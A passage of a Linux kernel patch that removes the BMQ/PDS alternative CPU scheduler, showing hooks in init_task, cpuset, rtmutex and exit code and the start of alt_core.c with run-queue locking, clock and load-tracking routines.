- 	.user_cpus_ptr	= NULL,
-@@ -88,6 +94,17 @@ struct task_struct init_task
- 	.restart_block	= {
- 		.fn = do_no_restart_syscall,
- 	},
-+#ifdef CONFIG_SCHED_ALT
-+	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
-+#ifdef CONFIG_SCHED_BMQ
-+	.boost_prio	= 0,
-+	.sq_idx		= 15,
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+	.deadline	= 0,
-+#endif
-+	.time_slice	= HZ,
-+#else
- 	.se		= {
- 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
- 	},
-@@ -95,6 +112,7 @@ struct task_struct init_task
- 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
- 		.time_slice	= RR_TIMESLICE,
- 	},
-+#endif
- 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
- #ifdef CONFIG_SMP
- 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
-diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
-index c2f1fd95a821..41654679b1b2 100644
---- a/kernel/Kconfig.preempt
-+++ b/kernel/Kconfig.preempt
-@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
- 
- config SCHED_CORE
- 	bool "Core Scheduling for SMT"
--	depends on SCHED_SMT
-+	depends on SCHED_SMT && !SCHED_ALT
- 	help
- 	  This option permits Core Scheduling, a means of coordinated task
- 	  selection across SMT siblings. When enabled -- see
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index b474289c15b8..a23224b45b03 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -787,7 +787,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
- 	return ret;
- }
- 
--#ifdef CONFIG_SMP
-+#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
- /*
-  * Helper routine for generate_sched_domains().
-  * Do cpusets a, b have overlapping effective cpus_allowed masks?
-@@ -1183,7 +1183,7 @@ static void rebuild_sched_domains_locked(void)
- 	/* Have scheduler rebuild the domains */
- 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
- }
--#else /* !CONFIG_SMP */
-+#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
- static void rebuild_sched_domains_locked(void)
- {
- }
-diff --git a/kernel/delayacct.c b/kernel/delayacct.c
-index e39cb696cfbd..463423572e09 100644
---- a/kernel/delayacct.c
-+++ b/kernel/delayacct.c
-@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
- 	 */
- 	t1 = tsk->sched_info.pcount;
- 	t2 = tsk->sched_info.run_delay;
--	t3 = tsk->se.sum_exec_runtime;
-+	t3 = tsk_seruntime(tsk);
- 
- 	d->cpu_count += t1;
- 
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 35e0a31a0315..64e368441cf4 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -125,7 +125,7 @@ static void __exit_signal(struct task_struct *tsk)
- 			sig->curr_target = next_thread(tsk);
- 	}
- 
--	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
-+	add_device_randomness((const void*) &tsk_seruntime(tsk),
- 			      sizeof(unsigned long long));
- 
- 	/*
-@@ -146,7 +146,7 @@ static void __exit_signal(struct task_struct *tsk)
- 	sig->inblock += task_io_get_inblock(tsk);
- 	sig->oublock += task_io_get_oublock(tsk);
- 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
--	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
-+	sig->sum_sched_runtime += tsk_seruntime(tsk);
- 	sig->nr_threads--;
- 	__unhash_process(tsk, group_dead);
- 	write_sequnlock(&sig->stats_lock);
-diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
-index 7779ee8abc2a..5b9893cdfb1b 100644
---- a/kernel/locking/rtmutex.c
-+++ b/kernel/locking/rtmutex.c
-@@ -300,21 +300,25 @@ static __always_inline void
- waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
- {
- 	waiter->prio = __waiter_prio(task);
--	waiter->deadline = task->dl.deadline;
-+	waiter->deadline = __tsk_deadline(task);
- }
- 
- /*
-  * Only use with rt_mutex_waiter_{less,equal}()
-  */
- #define task_to_waiter(p)	\
--	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
-+	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
- 
- static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 						struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline < right->deadline);
-+#else
- 	if (left->prio < right->prio)
- 		return 1;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -323,16 +327,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return dl_time_before(left->deadline, right->deadline);
-+#endif
- 
- 	return 0;
-+#endif
- }
- 
- static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 						 struct rt_mutex_waiter *right)
- {
-+#ifdef CONFIG_SCHED_PDS
-+	return (left->deadline == right->deadline);
-+#else
- 	if (left->prio != right->prio)
- 		return 0;
- 
-+#ifndef CONFIG_SCHED_BMQ
- 	/*
- 	 * If both waiters have dl_prio(), we check the deadlines of the
- 	 * associated tasks.
-@@ -341,8 +351,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
- 	 */
- 	if (dl_prio(left->prio))
- 		return left->deadline == right->deadline;
-+#endif
- 
- 	return 1;
-+#endif
- }
- 
- static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
-diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
-index 976092b7bd45..31d587c16ec1 100644
---- a/kernel/sched/Makefile
-+++ b/kernel/sched/Makefile
-@@ -28,7 +28,12 @@ endif
- # These compilation units have roughly the same size and complexity - so their
- # build parallelizes well and finishes roughly at once:
- #
-+ifdef CONFIG_SCHED_ALT
-+obj-y += alt_core.o
-+obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
-+else
- obj-y += core.o
- obj-y += fair.o
-+endif
- obj-y += build_policy.o
- obj-y += build_utility.o
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-new file mode 100644
-index 000000000000..a9e906b229eb
---- /dev/null
-+++ b/kernel/sched/alt_core.c
-@@ -0,0 +1,7982 @@
-+/*
-+ *  kernel/sched/alt_core.c
-+ *
-+ *  Core alternative kernel scheduler code and related syscalls
-+ *
-+ *  Copyright (C) 1991-2002  Linus Torvalds
-+ *
-+ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
-+ *		a whole lot of those previous things.
-+ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
-+ *		scheduler by Alfred Chen.
-+ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
-+ */
-+#include <linux/sched/cputime.h>
-+#include <linux/sched/debug.h>
-+#include <linux/sched/isolation.h>
-+#include <linux/sched/loadavg.h>
-+#include <linux/sched/mm.h>
-+#include <linux/sched/nohz.h>
-+#include <linux/sched/stat.h>
-+#include <linux/sched/wake_q.h>
-+
-+#include <linux/blkdev.h>
-+#include <linux/context_tracking.h>
-+#include <linux/cpuset.h>
-+#include <linux/delayacct.h>
-+#include <linux/init_task.h>
-+#include <linux/kcov.h>
-+#include <linux/kprobes.h>
-+#include <linux/nmi.h>
-+#include <linux/scs.h>
-+
-+#include <uapi/linux/sched/types.h>
-+
-+#include <asm/irq_regs.h>
-+#include <asm/switch_to.h>
-+
-+#define CREATE_TRACE_POINTS
-+#include <trace/events/sched.h>
-+#undef CREATE_TRACE_POINTS
-+
-+#include "sched.h"
-+
-+#include "pelt.h"
-+
-+#include "../../io_uring/io-wq.h"
-+#include "../smpboot.h"
-+
-+/*
-+ * Export tracepoints that act as a bare tracehook (ie: have no trace event
-+ * associated with them) to allow external modules to probe them.
-+ */
-+EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+#define sched_feat(x)	(1)
-+/*
-+ * Print a warning if need_resched is set for the given duration (if
-+ * LATENCY_WARN is enabled).
-+ *
-+ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
-+ * per boot.
-+ */
-+__read_mostly int sysctl_resched_latency_warn_ms = 100;
-+__read_mostly int sysctl_resched_latency_warn_once = 1;
-+#else
-+#define sched_feat(x)	(0)
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+#define ALT_SCHED_VERSION "v6.1-r4"
-+
-+/* rt_prio(prio) defined in include/linux/sched/rt.h */
-+#define rt_task(p)		rt_prio((p)->prio)
-+#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
-+#define task_has_rt_policy(p)	(rt_policy((p)->policy))
-+
-+#define STOP_PRIO		(MAX_RT_PRIO - 1)
-+
-+/* Default time slice is 4 ms; it can be set via the kernel parameter "sched_timeslice" */
-+u64 sched_timeslice_ns __read_mostly = (4 << 20);
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#include "bmq.h"
-+#endif
-+#ifdef CONFIG_SCHED_PDS
-+#include "pds.h"
-+#endif
-+
-+static int __init sched_timeslice(char *str)
-+{
-+	int timeslice_ms;
-+
-+	get_option(&str, &timeslice_ms);
-+	if (2 != timeslice_ms)
-+		timeslice_ms = 4;
-+	sched_timeslice_ns = timeslice_ms << 20;
-+	sched_timeslice_imp(timeslice_ms);
-+
-+	return 0;
-+}
-+early_param("sched_timeslice", sched_timeslice);
-+
-+/* Reschedule if less than this many μs left */
-+#define RESCHED_NS		(100 << 10)
-+
-+/**
-+ * sched_yield_type - Choose what sort of yield sched_yield will perform.
-+ * 0: No yield.
-+ * 1: Deboost and requeue task. (default)
-+ * 2: Set rq skip task.
-+ */
-+int sched_yield_type __read_mostly = 1;
-+
-+#ifdef CONFIG_SMP
-+static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
-+
-+DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
-+
-+#ifdef CONFIG_SCHED_SMT
-+DEFINE_STATIC_KEY_FALSE(sched_smt_present);
-+EXPORT_SYMBOL_GPL(sched_smt_present);
-+#endif
-+
-+/*
-+ * Keep a unique ID per domain (we use the first CPU's number in the cpumask of
-+ * the domain); this allows us to quickly tell if two cpus are in the same cache
-+ * domain, see cpus_share_cache().
-+ */
-+DEFINE_PER_CPU(int, sd_llc_id);
-+#endif /* CONFIG_SMP */
-+
-+static DEFINE_MUTEX(sched_hotcpu_mutex);
-+
-+DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
-+#endif
-+static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
-+static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
-+
-+/* sched_queue related functions */
-+static inline void sched_queue_init(struct sched_queue *q)
-+{
-+	int i;
-+
-+	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
-+	for(i = 0; i < SCHED_BITS; i++)
-+		INIT_LIST_HEAD(&q->heads[i]);
-+}
-+
-+/*
-+ * Init the idle task and put it into the queue structure of the rq
-+ * IMPORTANT: may be called multiple times for a single cpu
-+ */
-+static inline void sched_queue_init_idle(struct sched_queue *q,
-+					 struct task_struct *idle)
-+{
-+	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
-+	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
-+	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
-+}
-+
-+static inline void
-+clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static inline void
-+set_recorded_preempt_mask(int pr, int low, int high, int cpu)
-+{
-+	if (low < pr && pr <= high)
-+		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
-+}
-+
-+static atomic_t sched_prio_record = ATOMIC_INIT(0);
-+
-+/* water mark related functions */
-+static inline void update_sched_preempt_mask(struct rq *rq)
-+{
-+	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	unsigned long last_prio = rq->prio;
-+	int cpu, pr;
-+
-+	if (prio == last_prio)
-+		return;
-+
-+	rq->prio = prio;
-+	cpu = cpu_of(rq);
-+	pr = atomic_read(&sched_prio_record);
-+
-+	if (prio < last_prio) {
-+		if (IDLE_TASK_SCHED_PRIO == last_prio) {
-+			cpumask_clear_cpu(cpu, sched_idle_mask);
-+			last_prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+			if (static_branch_likely(&sched_smt_present))
-+				cpumask_andnot(&sched_sg_idle_mask,
-+					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+#endif
-+		}
-+		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
-+
-+		return;
-+	}
-+	/* last_prio < prio */
-+	if (IDLE_TASK_SCHED_PRIO == prio) {
-+		cpumask_set_cpu(cpu, sched_idle_mask);
-+		prio -= 2;
-+#ifdef CONFIG_SCHED_SMT
-+		if (static_branch_likely(&sched_smt_present)) {
-+			cpumask_t tmp;
-+
-+			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
-+			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
-+				cpumask_or(&sched_sg_idle_mask,
-+					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
-+		}
-+#endif
-+	}
-+	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
-+}
-+
-+/*
-+ * This routine assumes that the idle task is always in the queue
-+ */
-+static inline struct task_struct *sched_rq_first_task(struct rq *rq)
-+{
-+	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
-+	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+	return list_first_entry(head, struct task_struct, sq_node);
-+}
-+
-+static inline struct task_struct *
-+sched_rq_next_task(struct task_struct *p, struct rq *rq)
-+{
-+	unsigned long idx = p->sq_idx;
-+	struct list_head *head = &rq->queue.heads[idx];
-+
-+	if (list_is_last(&p->sq_node, head)) {
-+		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
-+				    sched_idx2prio(idx, rq) + 1);
-+		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
-+
-+		return list_first_entry(head, struct task_struct, sq_node);
-+	}
-+
-+	return list_next_entry(p, sq_node);
-+}
-+
-+static inline struct task_struct *rq_runnable_task(struct rq *rq)
-+{
-+	struct task_struct *next = sched_rq_first_task(rq);
-+
-+	if (unlikely(next == rq->skip))
-+		next = sched_rq_next_task(next, rq);
-+
-+	return next;
-+}
-+
-+/*
-+ * Serialization rules:
-+ *
-+ * Lock order:
-+ *
-+ *   p->pi_lock
-+ *     rq->lock
-+ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
-+ *
-+ *  rq1->lock
-+ *    rq2->lock  where: rq1 < rq2
-+ *
-+ * Regular state:
-+ *
-+ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
-+ * local CPU's rq->lock, it optionally removes the task from the runqueue and
-+ * always looks at the local rq data structures to find the most eligible task
-+ * to run next.
-+ *
-+ * Task enqueue is also under rq->lock, possibly taken from another CPU.
-+ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
-+ * the local CPU to avoid bouncing the runqueue state around [ see
-+ * ttwu_queue_wakelist() ]
-+ *
-+ * Task wakeup, specifically wakeups that involve migration, are horribly
-+ * complicated to avoid having to take two rq->locks.
-+ *
-+ * Special state:
-+ *
-+ * System-calls and anything external will use task_rq_lock() which acquires
-+ * both p->pi_lock and rq->lock. As a consequence the state they change is
-+ * stable while holding either lock:
-+ *
-+ *  - sched_setaffinity()/
-+ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
-+ *  - set_user_nice():		p->se.load, p->*prio
-+ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
-+ *				p->se.load, p->rt_priority,
-+ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
-+ *  - sched_setnuma():		p->numa_preferred_nid
-+ *  - sched_move_task():        p->sched_task_group
-+ *  - uclamp_update_active()	p->uclamp*
-+ *
-+ * p->state <- TASK_*:
-+ *
-+ *   is changed locklessly using set_current_state(), __set_current_state() or
-+ *   set_special_state(), see their respective comments, or by
-+ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
-+ *   concurrent self.
-+ *
-+ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
-+ *
-+ *   is set by activate_task() and cleared by deactivate_task(), under
-+ *   rq->lock. Non-zero indicates the task is runnable, the special
-+ *   ON_RQ_MIGRATING state is used for migration without holding both
-+ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
-+ *
-+ * p->on_cpu <- { 0, 1 }:
-+ *
-+ *   is set by prepare_task() and cleared by finish_task() such that it will be
-+ *   set before p is scheduled-in and cleared after p is scheduled-out, both
-+ *   under rq->lock. Non-zero indicates the task is running on its CPU.
-+ *
-+ *   [ The astute reader will observe that it is possible for two tasks on one
-+ *     CPU to have ->on_cpu = 1 at the same time. ]
-+ *
-+ * task_cpu(p): is changed by set_task_cpu(), the rules are:
-+ *
-+ *  - Don't call set_task_cpu() on a blocked task:
-+ *
-+ *    We don't care what CPU we're not running on; this simplifies hotplug,
-+ *    the CPU assignment of blocked tasks isn't required to be valid.
-+ *
-+ *  - for try_to_wake_up(), called under p->pi_lock:
-+ *
-+ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
-+ *
-+ *  - for migration called under rq->lock:
-+ *    [ see task_on_rq_migrating() in task_rq_lock() ]
-+ *
-+ *    o move_queued_task()
-+ *    o detach_task()
-+ *
-+ *  - for migration called under double_rq_lock():
-+ *
-+ *    o __migrate_swap_task()
-+ *    o push_rt_task() / pull_rt_task()
-+ *    o push_dl_task() / pull_dl_task()
-+ *    o dl_task_offline_migration()
-+ *
-+ */
-+
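-+/*
-+ * In code, the nesting above looks like this (a sketch only;
-+ * task_rq_lock() further below implements exactly this order):
-+ *
-+ *	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+ *	raw_spin_lock(&task_rq(p)->lock);
-+ */
-+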
-+/*
-+ * Context: p->pi_lock
-+ */
-+static inline struct rq *
-+__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock(&rq->lock);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock(&rq->lock);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			*plock = NULL;
-+			return rq;
-+		}
-+	}
-+}
-+
-+static inline void
-+__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
-+{
-+	if (lock)
-+		raw_spin_unlock(lock);
-+}
-+
-+static inline struct rq *
-+task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
-+			  unsigned long *flags)
-+{
-+	struct rq *rq;
-+	for (;;) {
-+		rq = task_rq(p);
-+		if (p->on_cpu || task_on_rq_queued(p)) {
-+			raw_spin_lock_irqsave(&rq->lock, *flags);
-+			if (likely((p->on_cpu || task_on_rq_queued(p))
-+				   && rq == task_rq(p))) {
-+				*plock = &rq->lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&rq->lock, *flags);
-+		} else if (task_on_rq_migrating(p)) {
-+			do {
-+				cpu_relax();
-+			} while (unlikely(task_on_rq_migrating(p)));
-+		} else {
-+			raw_spin_lock_irqsave(&p->pi_lock, *flags);
-+			if (likely(!p->on_cpu && !p->on_rq &&
-+				   rq == task_rq(p))) {
-+				*plock = &p->pi_lock;
-+				return rq;
-+			}
-+			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
-+		}
-+	}
-+}
-+
-+static inline void
-+task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
-+			      unsigned long *flags)
-+{
-+	raw_spin_unlock_irqrestore(lock, *flags);
-+}
-+
-+/*
-+ * __task_rq_lock - lock the rq @p resides on.
-+ */
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	lockdep_assert_held(&p->pi_lock);
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
-+			return rq;
-+		raw_spin_unlock(&rq->lock);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+/*
-+ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
-+ */
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	for (;;) {
-+		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		/*
-+		 *	move_queued_task()		task_rq_lock()
-+		 *
-+		 *	ACQUIRE (rq->lock)
-+		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
-+		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
-+		 *	[S] ->cpu = new_cpu		[L] task_rq()
-+		 *					[L] ->on_rq
-+		 *	RELEASE (rq->lock)
-+		 *
-+		 * If we observe the old CPU in task_rq_lock(), the acquire of
-+		 * the old rq->lock will fully serialize against the stores.
-+		 *
-+		 * If we observe the new CPU in task_rq_lock(), the address
-+		 * dependency headed by '[L] rq = task_rq()' and the acquire
-+		 * will pair with the WMB to ensure we then also see migrating.
-+		 */
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
-+			return rq;
-+		}
-+		raw_spin_unlock(&rq->lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
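-+/*
-+ * Typical caller pattern (a sketch; it assumes the matching
-+ * task_rq_unlock() helper that drops both locks in reverse order):
-+ *
-+ *	struct rq_flags rf;
-+ *	struct rq *rq = task_rq_lock(p, &rf);
-+ *
-+ *	... p's rq and scheduling state are stable here ...
-+ *
-+ *	task_rq_unlock(rq, p, &rf);
-+ */
-+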
-+static inline void
-+rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irqsave(&rq->lock, rf->flags);
-+}
-+
-+static inline void
-+rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
-+}
-+
-+void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
-+{
-+	raw_spinlock_t *lock;
-+
-+	/* Matches synchronize_rcu() in __sched_core_enable() */
-+	preempt_disable();
-+
-+	for (;;) {
-+		lock = __rq_lockp(rq);
-+		raw_spin_lock_nested(lock, subclass);
-+		if (likely(lock == __rq_lockp(rq))) {
-+			/* preempt_count *MUST* be > 1 */
-+			preempt_enable_no_resched();
-+			return;
-+		}
-+		raw_spin_unlock(lock);
-+	}
-+}
-+
-+void raw_spin_rq_unlock(struct rq *rq)
-+{
-+	raw_spin_unlock(rq_lockp(rq));
-+}
-+
-+/*
-+ * RQ-clock updating methods:
-+ */
-+
-+static void update_rq_clock_task(struct rq *rq, s64 delta)
-+{
-+/*
-+ * In theory, the compiler should just see 0 here, and optimize out the call
-+ * to sched_rt_avg_update. But I don't trust it...
-+ */
-+	s64 __maybe_unused steal = 0, irq_delta = 0;
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
-+
-+	/*
-+	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
-+	 * this case when a previous update_rq_clock() happened inside a
-+	 * {soft,}irq region.
-+	 *
-+	 * When this happens, we stop ->clock_task and only update the
-+	 * prev_irq_time stamp to account for the part that fit, so that a next
-+	 * update will consume the rest. This ensures ->clock_task is
-+	 * monotonic.
-+	 *
-+	 * It does, however, cause some slight misattribution of {soft,}irq
-+	 * time; a more accurate solution would be to update the irq_time using
-+	 * the current rq->clock timestamp, except that would require using
-+	 * atomic ops.
-+	 */
-+	if (irq_delta > delta)
-+		irq_delta = delta;
-+
-+	rq->prev_irq_time += irq_delta;
-+	delta -= irq_delta;
-+	psi_account_irqtime(rq->curr, irq_delta);
-+#endif
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	if (static_key_false((&paravirt_steal_rq_enabled))) {
-+		steal = paravirt_steal_clock(cpu_of(rq));
-+		steal -= rq->prev_steal_time_rq;
-+
-+		if (unlikely(steal > delta))
-+			steal = delta;
-+
-+		rq->prev_steal_time_rq += steal;
-+		delta -= steal;
-+	}
-+#endif
-+
-+	rq->clock_task += delta;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	if ((irq_delta + steal))
-+		update_irq_load_avg(rq, irq_delta + steal);
-+#endif
-+}
-+
-+static inline void update_rq_clock(struct rq *rq)
-+{
-+	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
-+
-+	if (unlikely(delta <= 0))
-+		return;
-+	rq->clock += delta;
-+	update_rq_time_edge(rq);
-+	update_rq_clock_task(rq, delta);
-+}
-+
-+/*
-+ * RQ Load update routine
-+ */
-+#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
-+#define RQ_UTIL_SHIFT			(8)
-+#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
-+
-+#define LOAD_BLOCK(t)		((t) >> 17)
-+#define LOAD_HALF_BLOCK(t)	((t) >> 16)
-+#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
-+#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
-+#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
-+
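-+/*
-+ * Worked example of the constants above (illustrative arithmetic only):
-+ * RQ_LOAD_HISTORY_BITS is 32, so RQ_LOAD_HISTORY_TO_UTIL(l) reduces to
-+ * ((l) >> 23) & 0xff, i.e. the eight history bits just below the MSB,
-+ * while LOAD_BLOCK() divides the ns-resolution rq clock into 2^17 ns
-+ * (~131 us) blocks.
-+ */
-+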
-+static inline void rq_load_update(struct rq *rq)
-+{
-+	u64 time = rq->clock;
-+	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
-+			RQ_LOAD_HISTORY_BITS - 1);
-+	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
-+	u64 curr = !!rq->nr_running;
-+
-+	if (delta) {
-+		rq->load_history = rq->load_history >> delta;
-+
-+		if (delta < RQ_UTIL_SHIFT) {
-+			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
-+			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
-+				rq->load_history ^= LOAD_BLOCK_BIT(delta);
-+		}
-+
-+		rq->load_block = BLOCK_MASK(time) * prev;
-+	} else {
-+		rq->load_block += (time - rq->load_stamp) * prev;
-+	}
-+	if (prev ^ curr)
-+		rq->load_history ^= CURRENT_LOAD_BIT;
-+	rq->load_stamp = time;
-+}
-+
-+unsigned long rq_load_util(struct rq *rq, unsigned long max)
-+{
-+	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
-+}
-+
-+#ifdef CONFIG_SMP
-+unsigned long sched_cpu_util(int cpu)
-+{
-+	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
-+}
-+#endif /* CONFIG_SMP */
-+
-+#ifdef CONFIG_CPU_FREQ
-+/**
-+ * cpufreq_update_util - Take a note about CPU utilization changes.
-+ * @rq: Runqueue to carry out the update for.
-+ * @flags: Update reason flags.
-+ *
-+ * This function is called by the scheduler on the CPU whose utilization is
-+ * being updated.
-+ *
-+ * It can only be called from RCU-sched read-side critical sections.
-+ *
-+ * The way cpufreq is currently arranged requires it to evaluate the CPU
-+ * performance state (frequency/voltage) on a regular basis to prevent it from
-+ * being stuck in a completely inadequate performance level for too long.
-+ * That is not guaranteed to happen if the updates are only triggered from CFS
